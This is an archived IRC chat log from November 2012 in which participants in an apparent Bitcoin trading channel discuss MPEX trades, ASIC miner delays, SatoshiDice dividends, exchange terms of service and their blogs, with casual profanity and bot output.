02:00:42 whoops Nov 18 02:00:44 sorry Nov 18 02:00:52 Daughter got ahold of the keyboard Nov 18 02:06:56 I was just asked if we have a claim process ready for if glbse never gives out info Nov 18 02:07:40 in most cases i don't see how it could be done Nov 18 02:07:49 'zactly Nov 18 02:08:09 I said that if a good process becomes known, we'll use it Nov 18 02:10:44 everyone's asked this and nobody'll have a good answer. Nov 18 02:10:56 teh people will be pissy. Nov 18 02:42:52 am i doing this wrong? Nov 18 02:43:08 ;;calc 50*6*24*30*[ticker --last] Nov 18 02:43:08 2550957.84 Nov 18 02:47:05 /2 Nov 18 02:47:12 ;) Nov 18 02:47:15 soon Nov 18 02:47:24 ;s Nov 18 02:47:28 so soon Nov 18 02:48:35 [MPEX] [O.BTCUSD.P120T] 4 @ 0.10733077 = 0.4293 BTC [-] Nov 18 02:50:03 what's that ? six months worth of bitcoins ? Nov 18 02:50:26 one month Nov 18 02:50:31 a yeah Nov 18 02:50:39 tho im pretty sure there's barely two weeks left. Nov 18 02:50:48 more like 10 days Nov 18 02:51:29 yeah, but it means that the miners ar prolly using or saving most of the generated btc recently Nov 18 02:51:47 'cause if they were selling it, it'd tank the price Nov 18 02:52:58 well, maybe i'm wrong here, Nov 18 02:52:58 alternatively, it means that mtgox's marketshare leaking has been going steady and possibly aggravating Nov 18 02:53:03 to the point they don't have half the market. Nov 18 02:53:09 mtgox 30day volume is 10mil usd Nov 18 02:53:25 i fear they went from two thirds this spring to something like 40% today. Nov 18 02:53:52 well, i'll calc that # right now Nov 18 02:54:30 ;;ticker Nov 18 02:54:31 BTCUSD ticker | Best bid: 11.79000, Best ask: 11.81000, Bid-ask spread: 0.02000, Last trade: 11.79000, 24 hour volume: 19628.77008381, 24 hour low: 11.52000, 24 hour high: 11.81000, 24 hour vwap: 11.67984 Nov 18 02:54:39 i guess we see 12 soon Nov 18 02:56:40 30 day volume of all bitcoincharts reporting exchanges (except gox) Nov 18 02:56:42 642026 Nov 18 02:56:55 gox Nov 18 02:56:59 972593 Nov 18 02:57:22 ;;calc 972593/(972593+642026) Nov 18 02:57:22 0.602366874167 Nov 18 02:58:12 gox deposits were totally fucked up from USA last month Nov 18 02:58:17 don't know if that has changed Nov 18 02:58:25 BofA blacklist Nov 18 03:00:16 smickles you realise plenty of trade happens otc Nov 18 03:00:26 o look, it's Bugpowder Nov 18 03:00:30 how you been ? Nov 18 03:00:34 busy Nov 18 03:00:56 I see I should have held onto my MPOE stock Nov 18 03:01:01 better busy than dead Nov 18 03:01:04 o, you sold ? Nov 18 03:01:11 could have made all the fucked up losses back Nov 18 03:01:27 story of the bitcoin stock world Nov 18 03:01:47 at least MPCD.A was good Nov 18 03:01:50 naw, story of the bitcoin stock world is moar like http://trilema.com/2012/icbitse-the-bucket-shop/ Nov 18 03:01:55 mircea_popescu: yeah, we can't discount otc trading Nov 18 03:02:01 o, btw, patrick harnett has scammer tag now. Nov 18 03:02:03 Paid Content This article is available for a fee. Nov 18 03:02:06 aww! Nov 18 03:02:07 heh Nov 18 03:02:14 hey, you been reading it ?! Nov 18 03:02:27 getting up to date on the latest Nov 18 03:02:40 so pay me! :D Nov 18 03:03:00 GLBSE paid me my coins, but not my stock Nov 18 03:03:37 how many credits per article Nov 18 03:04:01 1 Nov 18 03:04:13 cheaper than the time Nov 18 03:04:15 times Nov 18 03:04:22 that's the idea. Nov 18 03:07:36 mircea_popescu is clearly making a living off of trilema credits Nov 18 03:08:14 lol. actually, it was making ok money before mpex. Nov 18 03:08:42 ;;sell 900 "Trilema Credits" at .1 BTC Nov 18 03:08:42 Order id 11746 created. Nov 18 03:10:15 ahahah Nov 18 03:11:20 may as well test the waters ;) Nov 18 03:11:38 ;;bc Nov 18 03:11:38 Error: "bc" is not a valid command. Nov 18 03:11:45 I wonder how much I could make off my blog with Adsense Nov 18 03:13:28 you have a blog ? Nov 18 03:14:09 yeah Nov 18 03:14:19 popular in the science world Nov 18 03:14:21 Bugpowder: i heard that the various btc ad networks pay better Nov 18 03:14:21 lol so link it Nov 18 03:14:44 I think the most profits would be direct negotiation with companies Nov 18 03:14:57 because its specialized Nov 18 03:15:16 http://brainwindows.org Nov 18 03:16:15 genetics ? Nov 18 03:16:33 pretty cool. Nov 18 03:17:20 "The field of connectomics …." /me has some research to do now Nov 18 03:17:50 i must know what connectomics is in detail Nov 18 03:18:37 cv is out of date Nov 18 03:18:54 Let me update that link Nov 18 03:19:21 so basically guy is a brain surgeon :D Nov 18 03:21:08 mircea_popescu: lol, i feel little now, my blog is all of two piddly unimportant links, this guy's blog is interesting science Nov 18 03:21:24 well so you just started. Nov 18 03:21:56 (wait for it) Nov 18 03:22:01 ACCOUNTING! Nov 18 03:22:52 totally got to write about the 'merican transition to fair value accounting methods Nov 18 03:23:30 lol. the us is never moving to fair value. Nov 18 03:23:33 it can't, by now. Nov 18 03:23:35 mouse neurosurgeon Nov 18 03:23:43 much more difficult Nov 18 03:23:46 everything is smaller Nov 18 03:23:46 Bugpowder you're gonna steal all oru womenz Nov 18 03:24:01 but... if you fuck up, get a new one Nov 18 03:24:03 hahaha you ever watch seinfeld ? is this episode which includes the need for very small instruments Nov 18 03:25:28 mircea_popescu watches seinfeld? hahaha Nov 18 03:25:30 I am not familiar with that episode, they only play the same 10 episodes in syndication Nov 18 03:26:02 i have the whole collection, i musta seen each episode a dozen times Nov 18 03:26:24 http://www.seinfeldscripts.com/TheMervGriffinShow.htm Nov 18 03:26:29 that's the onwe Nov 18 03:27:19 smickles This is a reasonable intro to connectomics... http://www.youtube.com/watch?v=BwjcLKegBfg He is the one stealing all the women btw. Nov 18 03:27:24 I am married Nov 18 03:27:54 Bugpowder: tkx :)\ Nov 18 03:28:40 being married makes it worse. Nov 18 03:29:57 hehe Nov 18 03:32:22 Wow. Mariota is fast Nov 18 03:42:42 [MPEX] [S.MPOE] 10032 @ 0.00049729 = 4.9888 BTC [+] Nov 18 03:42:44 [MPEX] [S.MPOE] 38100 @ 0.00049733 = 18.9483 BTC [+] Nov 18 03:42:45 [MPEX] [S.MPOE] 41347 @ 0.00049744 = 20.5677 BTC [+] Nov 18 03:42:46 [MPEX] [S.MPOE] 18500 @ 0.00049753 = 9.2043 BTC [+] Nov 18 03:42:47 [MPEX] [S.MPOE] 24700 @ 0.00049762 = 12.2912 BTC [+] Nov 18 03:42:48 [MPEX] [S.MPOE] 31102 @ 0.00050058 = 15.569 BTC [+] Nov 18 03:42:49 [MPEX] [S.MPOE] 12213 @ 0.00050064 = 6.1143 BTC [+] Nov 18 03:42:50 [MPEX] [S.MPOE] 55400 @ 0.00050068 = 27.7377 BTC [+] Nov 18 03:42:51 [MPEX] [S.MPOE] 27650 @ 0.00050073 = 13.8452 BTC [+] Nov 18 03:42:52 [MPEX] [S.MPOE] 38950 @ 0.00050081 = 19.5065 BTC [+] Nov 18 03:42:53 [MPEX] [S.MPOE] 26447 @ 0.00050082 = 13.2452 BTC [+] Nov 18 03:42:54 [MPEX] [S.MPOE] 9693 @ 0.00050087 = 4.8549 BTC [+] Nov 18 03:42:55 [MPEX] [S.MPOE] 34967 @ 0.00050092 = 17.5157 BTC [+] Nov 18 03:42:56 [MPEX] [S.MPOE] 47500 @ 0.00050376 = 23.9286 BTC [+] Nov 18 03:42:58 [MPEX] [S.MPOE] 31700 @ 0.00050381 = 15.9708 BTC [+] Nov 18 03:42:58 [MPEX] [S.MPOE] 28550 @ 0.00050382 = 14.3841 BTC [+] Nov 18 03:42:59 [MPEX] [S.MPOE] 19650 @ 0.00050383 = 9.9003 BTC [+] Nov 18 03:43:00 [MPEX] [S.MPOE] 36650 @ 0.00050388 = 18.4672 BTC [+] Nov 18 03:43:01 [MPEX] [S.MPOE] 19504 @ 0.00050392 = 9.8285 BTC [+] Nov 18 03:43:02 [MPEX] [S.MPOE] 48243 @ 0.00050394 = 24.3116 BTC [+] Nov 18 03:43:03 [MPEX] [S.MPOE] 41600 @ 0.00050395 = 20.9643 BTC [+] Nov 18 03:43:04 [MPEX] [S.MPOE] 51500 @ 0.00050395 = 25.9534 BTC [+] Nov 18 03:43:05 [MPEX] [S.MPOE] 4650 @ 0.00050395 = 2.3434 BTC [+] Nov 18 03:43:06 [MPEX] [S.MPOE] 51005 @ 0.000504 = 25.7065 BTC [+] Nov 18 03:43:07 [MPEX] [S.MPOE] 30605 @ 0.000504 = 15.4249 BTC [+] Nov 18 03:43:07 [MPEX] [S.MPOE] 29200 @ 0.00050401 = 14.7171 BTC [+] Nov 18 03:43:08 [MPEX] [S.MPOE] 45650 @ 0.00050402 = 23.0085 BTC [+] Nov 18 03:43:09 [MPEX] [S.MPOE] 31001 @ 0.00050403 = 15.6254 BTC [+] Nov 18 03:43:10 [MPEX] [S.MPOE] 31100 @ 0.00050404 = 15.6756 BTC [+] Nov 18 03:43:11 [MPEX] [S.MPOE] 6900 @ 0.00050412 = 3.4784 BTC [+] Nov 18 03:43:12 [MPEX] [S.MPOE] 33462 @ 0.00050412 = 16.8689 BTC [+] Nov 18 03:43:14 [MPEX] [S.MPOE] 37280 @ 0.00050413 = 18.794 BTC [+] Nov 18 03:43:15 [MPEX] [S.MPOE] 5149 @ 0.00050415 = 2.5959 BTC [+] Nov 18 03:43:39 hmm Nov 18 03:46:09 don't input those "random numbers" into gribble's calculator Nov 18 03:46:17 lol Nov 18 03:46:38 o hey Nov 18 03:47:21 pigeons inaba was cute, seeing how he's a sort of bfl-pr Nov 18 03:47:45 sans teh brasiere. Nov 18 03:49:28 is that a joke because mpoe-pr doesn't wear a brasiere? Nov 18 03:49:45 mircea_popescu thinks that inaba doesn't wear one Nov 18 03:51:04 he does ?! Nov 18 03:51:08 til. Nov 18 03:52:10 i didn't say he does. i just think you're being a little hasty saying he doesn't Nov 18 03:58:02 lolk Nov 18 03:59:32 I was going to bid .0009 for some options, Nov 18 03:59:52 bot came along and bid .07 Nov 18 04:00:04 [MPEX] [O.BTCUSD.P110T] 4 @ 0.07 = 0.28 BTC [-] Nov 18 04:00:15 :) Nov 18 04:00:55 110t, that has a good chance to expire worthless i guess Nov 18 04:03:06 pigeons but anyway, what's the latest word on bfl delivery ? december ? Nov 18 04:03:11 (i don't follow mining much) Nov 18 04:04:37 i haven't been following it either. one of the other compies (bASIC?) sent customers and email that their orders were "ready to ship" and they are the first asic miner company ready to ship (just as soon as they assemble and test them) Nov 18 04:05:01 only in bitcoinland untested and unassembled items are "ready to ship" Nov 18 04:05:13 lol, ready to ship, but we need to build them and see if they work firs Nov 18 04:05:24 XD Nov 18 04:05:27 it's like... see this pile of wood over here my good man smickles ? Nov 18 04:05:36 this is your ready to ship kitchen table Nov 18 04:05:46 mircea_popescu == ikea? Nov 18 04:05:53 ahaha! basikea! Nov 18 04:05:56 https://bitcointalk.org/index.php?topic=125588.0 Nov 18 04:06:38 isn't this cablepair's thing ? Nov 18 04:06:43 yes Nov 18 04:07:00 they printed the shipping invoices too, so they are ready Nov 18 04:07:34 btcfpga ? Nov 18 04:07:37 didn't even know those existed Nov 18 04:07:49 buzzdave Nov 18 04:07:49 Head of PR for BTCFPGA Nov 18 04:07:49 Global Moderator Nov 18 04:07:55 no this isn't basic. apparently a different one ? Nov 18 04:08:02 ah, it seems bfl componenets are "being loaded on a truck" for assembly when they arrive Nov 18 04:08:48 How are the numbers looking for Batch1? Nov 18 04:08:48 -I've got a pretty solid handle on number of units paid with BTC and completed Credit Cards. However I have over 350 54G units for which the credit card payments need to be verified. If every single one of those orders reconciles to a payment (doubtful), we'll be at around 800 of the 54G units paid for and in the ship-pile. Nov 18 04:08:58 wait, they sold 800 units so took like 1mn ?! Nov 18 04:09:29 yeah Nov 18 04:09:39 look at the price of that product Nov 18 04:09:58 like 1k no ? Nov 18 04:10:23 yeah i thought 1200 for the 54g Nov 18 04:10:44 man i am the least informed on bitcoin asic miners anyway Nov 18 04:11:22 so these guys got 1mn in, bfl took something like 5-6 ? Nov 18 04:11:28 overall the market is like10mn for these things. Nov 18 04:12:06 ;;calc 25 * 6 * 24 * 30 * 12 Nov 18 04:12:07 1296000 Nov 18 04:12:37 they're all fighting (with the current miners) for a 1,3 btc stake the next year. Nov 18 04:12:41 1,3mn btc Nov 18 04:12:52 i suspect tears. Nov 18 04:13:16 https://bitcointalk.org/index.php?topic=126415.msg1342108#msg1342108 Nov 18 04:13:17 ;;title Nov 18 04:13:17 (title ) -- Returns the HTML ... of a URL. Nov 18 04:13:23 ;;title https://bitcointalk.org/index.php?topic=126415.msg1342108#msg1342108 Nov 18 04:13:25 Private school is child slavery!!! Nov 18 04:13:34 mircea_popescu Mining is a loser game Nov 18 04:13:49 Bugpowder well... i kinda stayed out of it. Nov 18 04:13:53 unless you are first Nov 18 04:14:07 Bugpowder: not if the tax deduction is taken into account, and you planned to pay taxes in the first place Nov 18 04:14:28 tax deduction?? Nov 18 04:14:33 smickles in an economy as shitty as this tax credits aren't worht the mention Nov 18 04:14:40 i have tax credits coming out my ears. Nov 18 04:14:54 business can deduct expenses, like equipment purchases Nov 18 04:14:55 deductions are going bye bye Nov 18 04:15:00 yeah ok Nov 18 04:15:03 business Nov 18 04:15:10 well ofcourse business. Nov 18 04:15:11 "business" Nov 18 04:15:33 smickles i could probably bill an aditional 1-200k euros and not pay 100 euros more in tax atm for instance. Nov 18 04:15:36 how many of these people are even sole proprietor? Nov 18 04:15:58 90% of the buyers don't have a 'business' officially set up Nov 18 04:16:22 mircea_popescu: yeah, i have too many deductions Nov 18 04:16:22 true. Nov 18 04:16:52 and because the 'merican tax system is fucked, Nov 18 04:17:00 not only did i not pay fed income tax, Nov 18 04:17:06 they gave me 5kusd Nov 18 04:17:54 oh mircea_popescu, i thought for curiouslty you might be interested in the new litecoin global TOS. Nov 18 04:17:59 http://pastebin.com/7y9ck6i1 Nov 18 04:18:15 litecoin has a tos ?! Nov 18 04:18:26 that's outrageous Nov 18 04:18:43 o, the exchange, not the coin itself nm Nov 18 04:19:00 "The Corporation has zero legal tender exposure in any jurisdiction." Nov 18 04:19:15 heh. i recall the day mpoe-pr turned the tide on the sec panic. i suppose i shall be the only one to recall this. Nov 18 04:20:16 anyway, someone spent a day dilligently hammering c/p'd bits together, i call this progress. Nov 18 04:20:22 lol, they have, in their tos, made the "it's not legal tender, so it's not illegal' argument? Nov 18 04:20:31 of sorts. Nov 18 04:21:03 they are now run by BTC-TRADING, INC and so they changed the TOS to what I linked Nov 18 04:21:39 lol, 53 lines into it "We urge you to carefully read the Terms and Conditions of this Agreement and all other policies and disclosure statements referenced here or elsewhere on the website. Such policies are incorporated into this Agreement by reference and collectively form part of this Agreement." Nov 18 04:21:55 they wait 53 lines to say that you should read it Nov 18 04:21:58 your litecoins magically become "LITS" when you deposit them Nov 18 04:22:28 in case you thought litecoins were legal tender somewhere Nov 18 04:22:30 who's doing this anyway ? Nov 18 04:22:41 burnside is the guy's handle Nov 18 04:22:41 nefario-jr Nov 18 04:22:54 ;;gettrust burnside Nov 18 04:22:55 Trust relationship from user mircea_popescu to user burnside: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=burnside Nov 18 04:23:01 ravishing. Nov 18 04:23:49 i wish gribble reported l3 trust to, labeling it something like 'Tanya down the street\'s rating' Nov 18 04:24:08 anyway, the btc version is in testing,further along than asics Nov 18 04:24:34 A lawyer friend was not impressed with the monopoly money SEC defense argument btw... Nov 18 04:25:26 Bugpowder anything more concrete than that ? Nov 18 04:25:45 he is not a securities lawyer Nov 18 04:25:53 but he provided a bit of analysis Nov 18 04:25:55 do you think that the romanian regulators would see it the same way Nov 18 04:26:31 there has to be the law violated, not the precedent of other judgements iirc Nov 18 04:26:41 I'll post it on Trilema Nov 18 04:26:48 that works. do you ahve the link ? Nov 18 04:28:04 yeah Nov 18 04:28:24 http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Nov 18 04:29:09 mircea_popescu: where does the file have to be located for your avatar grabber to grab it? Nov 18 04:29:26 and what is the code to do that? Nov 18 04:29:27 oh here are the LTC-GLOBAL terms for creating an asset. The other one was for investors, err regular players of the simulation game: https://www.litecoinglobal.com/create Nov 18 04:29:48 smickles in the url you declare. Nov 18 04:30:03 the page simply lists your avatar as Nov 18 04:30:34 based off of the website feild or the server of the email field? Nov 18 04:30:51 This is accomplished by selling a true .virtual. ownership interest in the company to investors. Nov 18 04:30:55 lets not make sense Nov 18 04:30:58 smickles the website field. Nov 18 04:31:55 posted Nov 18 04:45:10 Bugpowder well... there's an answer. Nov 18 04:46:25 does googlebot have to pay the credit fee Nov 18 04:46:53 pigeons eheheh yep Nov 18 04:47:17 smickles your avatar worx nao Nov 18 04:48:07 it's worked for as long as I have tried to have it work Nov 18 04:48:09 why does nobody hold title to any inputs? Nov 18 04:48:28 i thought private key of the address was so Nov 18 04:49:19 pigeons: the btc was there already, no owner ... as i vaugely recall Nov 18 04:49:45 and you don't become the owner by having a priv key associated with a btc Nov 18 04:49:57 why not though? Nov 18 04:50:16 because you don't control the btc, it stays where it always was? Nov 18 04:50:30 ok thanks Nov 18 04:50:35 pigeons title tho. Nov 18 04:50:48 you have the address so you have the control of the sum. that's posession. Nov 18 04:50:52 whence do you have the title ? Nov 18 04:51:17 can you have title to something that the state doesn't give title for? Nov 18 04:51:21 do you mean to claim allodial title, as in, you were given it by god ? Nov 18 04:51:22 yes Nov 18 04:51:32 or else, is it fee simple ? is it from the monarch ? whence do you have it ? Nov 18 04:52:06 pigeons: i have title over this domain Nov 18 04:52:21 http://www.encyclopediabitcoinica.com/wiki/Smickles#Titles Nov 18 04:52:56 smickles do you know about the writing contest btw ? Nov 18 04:54:00 I should scrabble together something at least Nov 18 04:54:35 there is work on using bitcoin as a title system to real word assets also Nov 18 04:55:02 maybe namecoin is better for that casue you can also add values i dont know Nov 18 04:55:59 well, you're conflating distinct things. Nov 18 04:56:15 sigh Nov 18 04:56:18 that the bitcoin protocol may well be used or useful as a record of title is not too relevant in a discussion of actual title to bitcoins Nov 18 04:56:19 satoshidice Nov 18 04:56:26 just took my glbse moneys Nov 18 04:56:29 yes i see your point mircea_popescu Nov 18 04:56:31 apparently it's making money this month Nov 18 04:56:44 are you halping Bugpowder ? Nov 18 04:56:49 Bugpowder: as a shareholder, thankyou Nov 18 04:56:53 lol Nov 18 04:56:57 does last month's satoshi dice loss come out of any dividends this month? Nov 18 04:57:06 27 straight losses Nov 18 04:57:14 pigeons yes Nov 18 04:57:28 (f)Immediately upon publication of each Statement of Profit and Loss SatoshiDice will pay to shareholders as dividends a fraction of no less than 100% (one hundred percent) of the Net Profits, if any. Nov 18 04:57:32 ok keep playing then a little more please Bugpowder Nov 18 04:57:33 (h)In case of a monthly loss (which will occur occasionally due to the nature of statistical variance of bets), the loss amount will be carried over to the next month’s profits when calculating Net Profits. Nov 18 04:57:36 yeah, it carries over. Nov 18 04:57:53 pigeons: the dooglas chart shows that it's been overcome Nov 18 04:58:07 (even accounting for the bitcoin friday donation) Nov 18 04:58:11 smickles what's the numbers ? so i don't have to load the forum Nov 18 04:58:29 It's up 3000BTC Nov 18 04:58:39 a not bad. Nov 18 04:58:54 course... a coupla weeks to go, could do -5000 a day or w/e Nov 18 04:59:44 Upon such sale of stock, the owners, officers, and executives of the selling company obligate themselves with a fiduciary responsibility to the shareholders. Nov 18 04:59:58 jesus christ, people with a thesaurus should stop writing lawyeresque prose. Nov 18 05:00:09 https://bitcointalk.org/index.php?topic=80312.460 Nov 18 05:00:23 betraying a complete lack of understanding of even the most basic notions. Nov 18 05:01:33 mircea_popescu: about 15000 - 8000 - 2000 Nov 18 05:02:02 total profit nao, total profit at beginning of month, last months loss Nov 18 05:02:14 ya seems up a good amt. cool. Nov 18 05:02:38 #'s just from eyeballing chart Nov 18 05:03:45 oh yeah, tack on a - 400 for the donation Nov 18 05:05:06 do you really need to imagine? Nov 18 05:05:24 voting power == short term gain is the ultimate goal Nov 18 05:05:42 day-over-day, month-over-month, year-over-year Nov 18 05:05:47 moreover, evoorhees would have ended up spending 4k bitcoins in handling the entire process. Nov 18 05:06:13 whoever the fuck thought btc shares should have voting power. Nov 18 05:08:15 ;;calc 5000 / 100000000 Nov 18 05:08:15 5e-05 Nov 18 05:10:11 ;;ticker s.dice Nov 18 05:10:12 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Nov 18 05:10:15 !ticker s.dice Nov 18 05:10:17 [MPEX:S.DICE] 1day: 0.00339944 / 0.00339944 / 0.00339944 (5000 shares, 17.00 BTC), 30day: 0.00180002 / 0.00332998 / 0.0034 (1005363 shares, 3,347.84 BTC) Nov 18 05:10:30 ;;calc 5000 / 100000000/0.00332998 Nov 18 05:10:30 0.0150151051958 Nov 18 05:10:33 1.5% Nov 18 05:10:44 shit, thats' ... i was about to say Nov 18 05:11:06 pretty significant. Nov 18 05:11:31 looks like my accidentally buying 50 btc worth of shares will pay off Nov 18 05:13:15 {just kidding} Nov 18 05:24:41 oh hey mircea_popescu i know you don't go to the playground anymore, but they mentioned just now in -otc that black lotus ddos mitigation is accepting btc, and forbes is starting to pump them for an ip Nov 18 05:24:48 http://www.forbes.com/sites/petercohan/2012/09/06/can-black-lotus-break-through-its-glass-ceiling/2/ Nov 18 05:25:01 pretty cool. Nov 18 05:25:08 i want another ticker symbol on mpex, at least for when giga goes away Nov 18 05:25:16 (and yes i lolled at the time glbse was protected by cloudflare) Nov 18 05:25:39 :) Nov 18 05:26:05 well, but anyway, do they want to list on mpex or what ? Nov 18 05:26:22 i'm just giving your pr chick a lead Nov 18 05:26:39 i'm sure with her people skills they will sign right up :) Nov 18 05:26:45 asshat :D Nov 18 05:26:55 is any of their actual people around tho ? Nov 18 05:27:06 i just heard about them Nov 18 05:27:11 lol k. Nov 18 05:28:09 http://thenextweb.com/insider/2012/11/17/anonymous-takes-down-countless-israeli-sites-wipes-databases-leaks-emails-addresses-and-passwords/ Nov 18 05:28:19 in other news, israel sites suck worse than bitcoin sites. Nov 18 05:29:03 also, anonymous are fuckwits. defending palestine wtf. Nov 18 05:33:37 oh BL are also using bitpay like wordpress. you need to list bitpay Nov 18 05:34:07 ya, but i think they're tempted to try listing for fiat. Nov 18 05:35:01 well i know someone at bfl you can talk to... Nov 18 05:35:12 ok enough, i'll be here all week Nov 18 05:35:58 lol Nov 18 05:36:14 is inaba even AT bfl ? Nov 18 05:36:18 i thought they just hired a forum guy Nov 18 05:39:31 http://blog.smickles.com/bitcoin-2/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/ Nov 18 05:39:34 bwahahah! Nov 18 05:40:29 lol the blog bug, it's growing Nov 18 05:41:08 waiting for the S.DICE trades to come streaming in Nov 18 05:41:27 make your links active, tho, and use something like WP-Footnotes for footnotes Nov 18 05:41:36 pigeons: because I have a massive readership Nov 18 05:41:52 mircea_popescu: ah, right Nov 18 05:41:58 yes you should be careful not to manipulate the market with your clout Nov 18 05:42:00 howto footnote.... Nov 18 05:46:07 im off. gl all! **** BEGIN LOGGING AT Sun Nov 18 13:58:38 2012 Nov 18 14:17:25 "This post is a piece of sheer brilliance. A tour de force. Perfect clarity, insightful, no holds barred…priceless." Nov 18 14:30:23 [MPEX] [S.MPOE] 16878 @ 0.0005007 = 8.4508 BTC [-] Nov 18 15:11:48 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.88287601 = 882.876 BTC [-] Nov 18 15:12:45 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.78123286 = 781.2329 BTC [-] Nov 18 15:12:52 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.68079643 = 680.7964 BTC [-] Nov 18 15:13:01 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.48605987 = 486.0599 BTC [-] Nov 18 15:13:05 [MPEX] [O.BTCUSD.P170T] 1000 @ 0.58212876 = 582.1288 BTC [-] Nov 18 15:13:15 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.39378654 = 393.7865 BTC [-] Nov 18 15:41:47 ;;later tell bugpoweder http://trilema.com/2012/in-re-philosophy-freedom-of-scientific-information/ Nov 18 15:41:47 The operation succeeded. Nov 18 15:55:57 [MPEX] [S.MPOE] 10072 @ 0.0005007 = 5.0431 BTC [-] Nov 18 15:55:59 [MPEX] [S.MPOE] 23988 @ 0.00050077 = 12.0125 BTC [+] Nov 18 15:55:59 [MPEX] [S.MPOE] 3890 @ 0.00050089 = 1.9485 BTC [+] Nov 18 16:29:29 mornin Nov 18 16:32:19 eya. Nov 18 16:32:38 did i miss any drama? Nov 18 16:36:52 notrly. Nov 18 16:37:01 dammit :( Nov 18 16:39:51 i thought you were on vacation Nov 18 16:42:16 came back just now, made it a little shorter. Nov 18 16:44:26 :p Nov 18 16:44:32 vacations is just blowing money. Nov 18 16:44:41 hahaha i see Nov 18 16:44:48 well, bitcoin drama stocks are running real low Nov 18 16:44:53 watch price drop soon Nov 18 16:45:04 :D Nov 18 16:45:31 http://polimedia.us/dtng/c/src/134739086022.jpg << proper vacation Nov 18 16:46:30 why is this pic from the back? Nov 18 16:46:36 you need to paste one from the front. Nov 18 16:46:46 it is from the front... Nov 18 16:46:49 ITS NOT Nov 18 16:46:53 :p Nov 18 16:46:55 lol Nov 18 16:47:09 http://polimedia.us/dtng/c/src/135318434986.jpg Nov 18 16:47:17 thats right. Nov 18 16:53:15 [MPEX] [S.MPOE] 7860 @ 0.00050089 = 3.937 BTC [+] Nov 18 16:53:16 [MPEX] [S.MPOE] 20562 @ 0.00050094 = 10.3003 BTC [+] Nov 18 16:53:18 [MPEX] [S.MPOE] 21028 @ 0.000501 = 10.535 BTC [+] Nov 18 16:57:31 mircea_popescu: which drama do you expect to put pressure on the price? Nov 18 16:57:38 something good Nov 18 16:57:56 like... if bfl accused some compertitor that it broke into their lab and stole their pringles Nov 18 16:58:14 lol Nov 18 16:59:48 or if mtgox accidentally cc'd the entire userbase Nov 18 16:59:56 o no wait, that's already done. Nov 18 17:00:13 hehe, so why do you expect something like that now? Nov 18 17:00:23 force of habit i guess Nov 18 17:00:57 something like that happens all the time it seems, but hard to predict, just like price changes Nov 18 17:01:03 thought you had some insider info ;) Nov 18 17:01:27 sadly i do not Nov 18 17:04:33 incidentalyl, this is moderately interesting http://irdial.com/blogdial/?p=3445 Nov 18 17:44:02 [MPEX] [S.MPOE] 13672 @ 0.000501 = 6.8497 BTC [+] Nov 18 17:44:04 [MPEX] [S.MPOE] 6928 @ 0.000501 = 3.4709 BTC [+] Nov 18 17:48:35 I see usagi is back Nov 18 17:48:57 or - has been I suppose Nov 18 17:49:07 do't read forums or IRC much anymore Nov 18 17:49:38 hi JWU42, welcome back from the dead :p Nov 18 17:49:49 nice to be back - all well? Nov 18 17:49:58 give or take. :) Nov 18 17:50:14 you still hashin away? Nov 18 17:50:29 short of giving away far too mcuh BTC to shithead cammers like P and Nef Nov 18 17:50:37 yep - 38 Gh/s +/- Nov 18 17:50:47 aha Nov 18 17:50:53 did you opt for an upgrade or no? Nov 18 17:51:07 yeah - thankfully i did take those BTC from my P account Nov 18 17:51:12 ;> Nov 18 17:51:14 so not all lost Nov 18 17:51:20 if bfl delivers ;) Nov 18 17:51:24 heh Nov 18 17:51:32 I am not worried about that frankly Nov 18 17:51:46 what calmed you down? Nov 18 17:51:56 but like the single - they said October it ended up being February Nov 18 17:52:07 ASIC might be the same Nov 18 17:52:11 might?? Nov 18 17:52:17 arent they 'late' as we speak Nov 18 17:52:22 yep Nov 18 17:52:48 and then josh goes preaching to mp Nov 18 17:52:51 what a jackass. Nov 18 17:52:57 I felt the odds of them hitting October were < 1% Nov 18 17:53:07 hehe Nov 18 17:53:20 damn, why isn't there a backup available from Securities forum before this usagi the ass-hat deleted all his posts. Nov 18 17:53:31 Not sure what Josh said to MP - but he and MP are both strong personalities - not suprising they clash from time to time Nov 18 17:53:42 build something like 4chan archive for bitcointalke EskimoBob :) Nov 18 17:54:12 kakobrekla: out of what? Snow? :) Nov 18 17:54:21 I am not a programmer Nov 18 17:54:21 No guruvan today? Could someone tell him to unblock me on the forum when he comes around? ;) Nov 18 17:54:33 you can hire one. Nov 18 17:54:35 :p Nov 18 17:54:53 guruvan? The Trendons shill Nov 18 17:55:04 eh? Nov 18 17:55:21 Idunno. I just know I can't send him PMs and he did a BDK->BDK.BND exchange a while ago but hasn't filed a claim, yet. Nov 18 17:55:34 erryone is fuckin milky shill puppet these days. Nov 18 17:55:56 same fuck who uses //// or something like that as a username in btst channel? Nov 18 17:56:02 JWU42 post-btcfailure depression ? Nov 18 17:56:26 EskimoBob /// is imsaguy Nov 18 17:56:32 OK, sorry Nov 18 17:56:32 I am well passed that now MP - but was not fun for a while Nov 18 17:56:40 well good to hear Nov 18 17:56:46 self induced though - so just disappointed in myself Nov 18 17:56:47 but tbh i didn't think they can make october either. Nov 18 17:56:58 don't be too harsh, it's a learning process. Nov 18 17:57:03 (oh - then thanks /// - I did get what you sent on the 14th. Tried calling a week or two ago) Nov 18 17:57:11 most traders worth their salt in the city blew a LOT more than the dollar equiv of a few k btc. Nov 18 17:57:39 who cares what others did :) Nov 18 17:57:50 temp_kluge who are you talking to? Nov 18 17:57:59 ah Nov 18 17:58:01 to /// Nov 18 17:58:05 imsa is here Nov 18 17:58:05 you need the [s Nov 18 17:58:07 ya Nov 18 17:58:09 [\\\] Nov 18 17:58:10 [\\\] like that. Nov 18 17:58:12 like this. Nov 18 17:58:12 lol Nov 18 17:58:13 oh - I mean \\\ Nov 18 17:58:23 and the square brackets Nov 18 17:58:28 and milk. Nov 18 17:58:30 use [\\\] Nov 18 